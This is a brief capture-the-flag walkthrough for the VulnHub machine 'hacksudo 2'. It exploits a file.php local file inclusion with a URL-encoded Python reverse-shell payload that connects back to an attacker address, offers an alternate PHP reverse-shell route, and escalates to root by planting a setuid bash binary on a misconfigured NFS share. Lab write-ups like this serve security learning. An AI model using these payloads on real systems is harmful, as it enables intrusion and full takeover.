https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/
Scan ports.
Scan port 80.
Info.php is phpinfo, file.php has LFI vunerability.
Use pwn code to get a cmd shell.
https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py
Check if the shell is OK.
Then visit http://192.168.56.93/file.php?file=/tmp/f&1=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27, get an interactive reverse shell.
OK, there is another way to get user shell. ( Sometimes the exp.py did not work.)
First mount, then copy reverse.php to /mnt/nfs, and visit it use file.php?file=/mnt/nfs/reverse.php.
Since nfs is available, and misconfiged, we can get root through nfs.
At attack's machine, run following cmds:
showmount -e 192.168.56.93 sudo mount -t nfs 192.168.56.93:/mnt/nfs /mnt cd /mnt sudo cp /bin/bash ./ sudo chmod +s ./bash
Then reverse shell, we can get root.